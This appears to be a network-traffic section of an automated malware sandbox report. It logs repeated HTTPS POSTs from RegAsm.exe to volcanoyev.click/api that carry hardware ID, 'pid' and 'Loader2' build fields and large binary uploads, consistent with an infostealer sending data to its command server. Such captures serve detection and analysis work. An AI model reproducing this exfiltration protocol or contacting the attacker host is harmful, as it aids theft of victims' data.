                                                          Data Ascii: r2UcuQAVo5Ma6+MX5AoopUvt8SRUrstIInGIDoosKEB8rtyvgUYzkx4oc1fh2Lqy27wmtYQ/Cpt29pmYX6y7C/BmWf1ExWCPWrrwgqSMrWmHp2akVi/L1/fy2Bsb/HlUef0LbIuBMccZK+aX51i6tgtoo+GS/BqdM6Ifyxx8b1Rp+c7shFWmEwg4dkekiyxijK2i4BL+1NQ5Npncmvzmhz7omDxExH+Mkr90w+SYJ6fLby2qH+tan6L7mN0a/Hl


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          7           192.168.2.8  49720        172.67.195.241  443               4132  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp                Bytes transferred  Direction  Data
                                                          2024-12-24 01:18:28 UTC  279                OUT        POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=QZFPW1XF9RT4L83
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 15059
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:28 UTC  15059              OUT        Data Ascii:
                                                          --QZFPW1XF9RT4L83
                                                          Content-Disposition: form-data; name="hwid"

                                                          AD184EBCD679DD86AC8923850305D13E
                                                          --QZFPW1XF9RT4L83
                                                          Content-Disposition: form-data; name="pid"

                                                          2
                                                          --QZFPW1XF9RT4L83
                                                          Content-Disposition: form-data; name="lid"

                                                          VC6Dfm--Loader2
                                                          --QZF
                                                          2024-12-24 01:18:29 UTC  1134               IN         HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=u3f035si7194hv11l62nc2q7f9; expires=Fri, 18 Apr 2025 19:05:07 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vcPWJvCRCyNA19anyapZkb02%2FRmgvLCKZ83eGDtWo%2Fmcd4%2Fj%2BKHc0hXlQtcjZeRlOTdDkyE45Zppi%2Fu7XeB8JMue%2FKQrkTnh8jyDPupampKgo%2FwdLK7R4SOF9xQ20nBOi6G2"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1f39ac0729b-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1845&rtt_var=695&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15996&delivery_rate=1572428&cwnd=249&unsent_bytes=0&cid=db32a8edf2053717&ts=1117&x=0"
                                                          2024-12-24 01:18:29 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii (HTTP chunk, size 0xf = 15 bytes):
                                                          f
                                                          ok 8.46.123.189
                                                          2024-12-24 01:18:29 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii (terminating chunk):
                                                          0


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          8           192.168.2.8  49721        172.67.195.241  443               4132  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp                Bytes transferred  Direction  Data
                                                          2024-12-24 01:18:30 UTC  282                OUT        POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=ZT0EBBFSKA5FORKR2G
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 20244
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:30 UTC  15331              OUT        Data Ascii:
                                                          --ZT0EBBFSKA5FORKR2G
                                                          Content-Disposition: form-data; name="hwid"

                                                          AD184EBCD679DD86AC8923850305D13E
                                                          --ZT0EBBFSKA5FORKR2G
                                                          Content-Disposition: form-data; name="pid"

                                                          3
                                                          --ZT0EBBFSKA5FORKR2G
                                                          Content-Disposition: form-data; name="lid"

                                                          VC6Dfm--Loade
                                                          2024-12-24 01:18:31 UTC  1123               IN         HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=qnjhfu4e7074eu439ci8igh43g; expires=Fri, 18 Apr 2025 19:05:10 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNpvClxSriKANnrWXoN5d2kls54HnaEgeFKzDKlH7A1Vujk9w3M2Jb3rYQpOUtMKVOgMYTXVELSWSJQlyEQLEHv0Bf9lGPtQQMPodpsaUOWz5zN44q2Q9%2FGjiZWv4uY%2B8WIg"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc2028a01c411-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1527&rtt_var=616&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21206&delivery_rate=1912246&cwnd=224&unsent_bytes=0&cid=8078052870417cb5&ts=973&x=0"
                                                          2024-12-24 01:18:31 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii (HTTP chunk, size 0xf = 15 bytes):
                                                          f
                                                          ok 8.46.123.189
                                                          2024-12-24 01:18:31 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii (terminating chunk):
                                                          0


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          9           192.168.2.8  49723        172.67.195.241  443               4352  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp                Bytes transferred  Direction  Data
                                                          2024-12-24 01:18:33 UTC  283                OUT        POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=XDCI16EBE26VJHTU8DL
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 12854
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:33 UTC  12854              OUT        Data Ascii:
                                                          --XDCI16EBE26VJHTU8DL
                                                          Content-Disposition: form-data; name="hwid"

                                                          AD184EBCD679DD86AC8923850305D13E
                                                          --XDCI16EBE26VJHTU8DL
                                                          Content-Disposition: form-data; name="pid"

                                                          2
                                                          --XDCI16EBE26VJHTU8DL
                                                          Content-Disposition: form-data; name="lid"

                                                          VC6Dfm--Lo
                                                          2024-12-24 01:18:34 UTC  1129               IN         HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=imme555jqeni1c2mcbmf6l10r1; expires=Fri, 18 Apr 2025 19:05:12 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZp%2FBuyHjoZSXKPCgUxB4QHT2WQadm6ci3MC94g0rVZV%2BeJqL4mE1fpscBtAYq%2B%2BbUHildR2HiS6%2F37aqyTjpI8m8t3hFmPmxDG7ByX0YD1j1TvhHCH9eXcqWssPsKsTMX2D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc2115dec0f5b-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1467&rtt_var=576&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13795&delivery_rate=1859872&cwnd=218&unsent_bytes=0&cid=3e3290c3f6727057&ts=1119&x=0"
                                                          2024-12-24 01:18:34 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii (HTTP chunk, size 0xf = 15 bytes):
                                                          f
                                                          ok 8.46.123.189
                                                          2024-12-24 01:18:34 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii (terminating chunk):
                                                          0


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          10          192.168.2.8  49722        172.67.195.241  443               4132  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp                Bytes transferred  Direction  Data
                                                          2024-12-24 01:18:33 UTC  271                OUT        POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=XEBG0L3P
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 1206
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:33 UTC  1206               OUT        Data Ascii:
                                                          --XEBG0L3P
                                                          Content-Disposition: form-data; name="hwid"

                                                          AD184EBCD679DD86AC8923850305D13E
                                                          --XEBG0L3P
                                                          Content-Disposition: form-data; name="pid"

                                                          1
                                                          --XEBG0L3P
                                                          Content-Disposition: form-data; name="lid"

                                                          VC6Dfm--Loader2
                                                          --XEBG0L3P
                                                          Content-Dispos
                                                          2024-12-24 01:18:33 UTC  1124               IN         HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=hthnorj38o8evgo9vmkghtcs2v; expires=Fri, 18 Apr 2025 19:05:12 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yaZPJdofbVhZ1K1ptNKERmpoebXyeomAauusB24FOpzzg9bTvq0pjwZl%2FXB1ZYGQ3E%2BC2Y%2F8blzIWIdQeioZiwEQMFdQjGQhl0yT3GLUw6khQsmnhglUMYyh2Mfb9p%2BoWKe5"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc21199727279-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1768&rtt_var=675&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2113&delivery_rate=1606160&cwnd=220&unsent_bytes=0&cid=c42a8fc7e04ee19c&ts=833&x=0"
                                                          2024-12-24 01:18:33 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii (HTTP chunk, size 0xf = 15 bytes):
                                                          f
                                                          ok 8.46.123.189
                                                          2024-12-24 01:18:33 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii (terminating chunk):
                                                          0


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          11          192.168.2.8  49724        172.67.195.241  443               4132  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp                Bytes transferred  Direction  Data
                                                          2024-12-24 01:18:35 UTC  284                OUT        POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=B2IOVM6I5P62J56QYWC
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 589130
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:35 UTC  15331              OUT        Data Ascii:
                                                          --B2IOVM6I5P62J56QYWC
                                                          Content-Disposition: form-data; name="hwid"

                                                          AD184EBCD679DD86AC8923850305D13E
                                                          --B2IOVM6I5P62J56QYWC
                                                          Content-Disposition: form-data; name="pid"

                                                          1
                                                          --B2IOVM6I5P62J56QYWC
                                                          Content-Disposition: form-data; name="lid"

                                                          VC6Dfm--Lo
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 66 38 3f c3 a3 4a ce c6 fc a8 05 51 a6 5d e5 53 1e 9f 2e a1 6d bc 6f a8 fb 44 73 9e 29 2f 9d de 25 4c 66 38 44 06 a3 36 c1 c6 b5 a5 ce 8d 57 ef b9 b7 56 c6 c1 b4 28 b0 bb b0 bd 53 19 f1 07 ff 43 c3 67 f3 01 c1 27 9f 0f bc df 83 46 dc 13 90 32 09 0a 64 f1 d3 dc 20 ed 42 0c f5 15 04 57 ca a9 81 ee 84 33 a0 20 b5 57 13 0a 3a a4 58 20 0a fe c8 f5 c9 9d f4 71 1f 76 de 0f 1a 37 b7 fb a7 f5 e2 53 ce f0 cc bf b3 9b 59 80 ad 2e d2 df e3 b9 b0 d3 57 97 6d 32 9d 79 50 bd d9 ea 35 e9 a2 b2 51 20 9c 10 29 9b 1a 79 8f 6b 47 c7 d1 4f ce fb 26 25 f8 f2 0c 79 57 fc df 12 11 8f 9f 7e b6 f8 a9 00 f9 49 64 2b ff 31 e2 31 70 0c 51 89 4e 7f 33 42 79 7f d0 0e ee 94 61 c8 ce ee 40 5d 3b 1d 8f 22 f1 68 a0 2e 88 d4 8e 59 fb a1 cf cd 00 a2 8b 3c 42 39 d7 74 d4 08 5d 31 70 29 f9 f5
                                                          Data Ascii: f8?JQ]S.moDs)/%Lf8D6WV(SCg'F2d BW3 W:X qv7SY.Wm2yP5Q )ykGO&%yW~Id+11pQN3Bya@];"h.Y<B9t]1p)
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: ac 61 81 58 17 61 a5 09 c4 78 ae 77 63 14 cb b5 a3 4b e3 d1 0a 52 8b bf dc c0 56 fb 69 98 d4 3e b8 14 6e 58 28 e0 71 6f 21 16 30 b1 43 df 5e 94 29 6b 24 5e 5f 2d a0 24 c0 54 6b a3 13 61 3a 7d 68 45 8d 01 68 19 77 68 02 a0 d9 49 6e 6c 5d fe ee bd ee d0 a4 e5 f1 b8 fc 1c bb 94 2b 9f 8b 97 05 43 5a 27 47 c3 4f 2e 3c 7e b7 1b 51 d6 52 7f 69 f4 f3 ad 56 c1 97 a8 cb 05 37 17 56 17 c9 44 e4 c2 ff 1e b5 2c 43 2e 3a f7 6d 31 9a e5 8e 8c 7d 27 7c be fc 39 9b a7 f5 66 34 27 e1 3b 7b 63 34 91 b6 a2 c8 d8 c1 52 f0 20 0e 8f 4d ce 52 82 3f a8 30 d8 bf b8 71 e8 b4 28 38 55 4d cc 3c 73 cf 84 e7 29 c7 fa a1 29 2f 38 99 7a 30 2f 87 6f a1 6d d1 cd 91 fa 66 ab 24 7a 7e f5 15 81 37 59 fc c6 b7 eb 30 33 5a dd 63 cf ab 91 f7 55 b6 88 ec c3 76 1a dc 5f d6 61 54 55 f0 41 a7 4b 0f
                                                          Data Ascii: aXaxwcKRVi>nX(qo!0C^)k$^_-$Tka:}hEhwhInl]+CZ'GO.<~QRiV7VD,C.:m1}'|9f4';{c4R MR?0q(8UM<s))/8z0/omf$z~7Y03ZcUv_aTUAK
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: e2 e0 68 bc bd 3e 0a 05 22 3d e6 26 33 53 bf 1e 70 f4 3d bd c6 29 0d 5b 4d 02 4d 8b 37 c5 06 da 5f c2 46 40 1b 81 18 96 c1 51 f4 ed ef a8 74 de 58 d8 af a6 f4 44 21 1f 98 c1 41 65 54 3b 8a fd 38 1b ef 77 cd bc fe e2 b6 ff c9 0b c1 e7 af b4 d9 ab 69 2d be af 9a 85 2e d9 9d c5 1a a5 1b 14 9e 2b 15 7e 30 55 b6 6a f0 56 d3 d6 56 9c 25 ab b9 8f a9 94 ee 7a ed 94 76 9b 94 c3 79 29 3e 53 52 60 d0 72 5b 62 8c c3 87 3d d1 74 9f e5 5d e1 41 ef 16 b6 20 ec 55 76 8c 16 cd 58 f4 7e 6d d1 d2 ab 74 f3 63 43 83 e8 d6 69 39 c4 b9 48 ea 2a ef c0 8a 14 65 1c 47 4b 35 2e da 2c ce dd 28 f8 16 90 42 d1 e7 dc 7f d1 ec 91 2f f7 fc 7d ca d6 6d 76 ce e8 87 72 51 ae d7 ed 72 9b 3a 69 eb b3 36 66 ef e9 37 4b e7 6f 37 bf 7b f5 36 74 fa 51 4e fb 4a 88 e0 22 b3 2d 6b bf 65 ae 94 42 c5
                                                          Data Ascii: h>"=&3Sp=)[MM7_F@QtXD!AeT;8wi-.+~0UjVV%zvy)>SR`r[b=t]A UvX~mtcCi9H*eGK5.,(B/}mvrQr:i6f7Ko7{6tQNJ"-keB
                                                          2024-12-24 01:18:37 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=6ulu2itv0q9vhg9u0ofj8ufh8j; expires=Fri, 18 Apr 2025 19:05:16 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YOLovBlghpK6VOHp5t%2FetXhHPzeF9tOaGcLM1ft0fr6mMj4H0NN0xarJxWEqHDYxeaO7Vld3eq%2FEjNq8qoPyveeGimA7jmne4amGUjxnSTp3TH%2F9Jdj83%2BFHFzA4B758fCeZ"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc21feff64363-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2153&min_rtt=2152&rtt_var=810&sent=208&recv=612&lost=0&retrans=0&sent_bytes=2838&recv_bytes=591722&delivery_rate=1348729&cwnd=237&unsent_bytes=0&cid=ec6cf699b4fa7abf&ts=2391&x=0"


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                          12         | 192.168.2.8 | 49725       | 172.67.195.241 | 443              | 4352 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:35 UTC | 282               | OUT       | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=2DGZLGRS1W8I0K7T2Q
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 15077
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:35 UTC15077OUTData Raw: 2d 2d 32 44 47 5a 4c 47 52 53 31 57 38 49 30 4b 37 54 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 44 47 5a 4c 47 52 53 31 57 38 49 30 4b 37 54 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 44 47 5a 4c 47 52 53 31 57 38 49 30 4b 37 54 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65
                                                          Data Ascii: --2DGZLGRS1W8I0K7T2QContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--2DGZLGRS1W8I0K7T2QContent-Disposition: form-data; name="pid"2--2DGZLGRS1W8I0K7T2QContent-Disposition: form-data; name="lid"VC6Dfm--Loade
                                                          2024-12-24 01:18:36 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=gk9gqligd5p3jbihv9f2v3g56o; expires=Fri, 18 Apr 2025 19:05:14 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQY6XDLGG%2BXUD17Hyssec%2BfBgoiO%2BKHUGvKvfp5mZBrHbEKBQecYY7d%2Bv85%2BhfKnDaTgZcirQ3tsOinqWnFj4SYt7ihz2J3ry4cbIyl3Mvav9rgjOYTnvKhEoe9HNCgeAzOd"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc21ffe3319b6-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1799&rtt_var=684&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16017&delivery_rate=1590413&cwnd=170&unsent_bytes=0&cid=388e2462e7f3e304&ts=834&x=0"
                                                          2024-12-24 01:18:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                          13         | 192.168.2.8 | 49726       | 172.67.195.241 | 443              | 4352 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:37 UTC | 273               | OUT       | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=NYG34FC09
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 20190
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:37 UTC15331OUTData Raw: 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                          Data Ascii: --NYG34FC09Content-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--NYG34FC09Content-Disposition: form-data; name="pid"3--NYG34FC09Content-Disposition: form-data; name="lid"VC6Dfm--Loader2--NYG34FC09Content-Di
                                                          2024-12-24 01:18:37 UTC4859OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 a3 c3 52 df 0f 03 00
                                                          Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0R
                                                          2024-12-24 01:18:38 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=jsq1fj5kja5j0tlj4vatuj3lk2; expires=Fri, 18 Apr 2025 19:05:17 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VmFrz7l3FI6aeDZ1DPMuoIJDSKRe%2BI51acnSy8oT1kIt3hjDMHM8ALQzQwClaCRhL1O9vJuFZKpD2w7oYp05Ri1U45s2tGYoY0fwD4DcGTJMpnisTGReFFDBPS80z%2FkDE8IJ"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc22d1fdf0f9f-EWR
                                                          alt-svc: h3=":443"; ma=86400
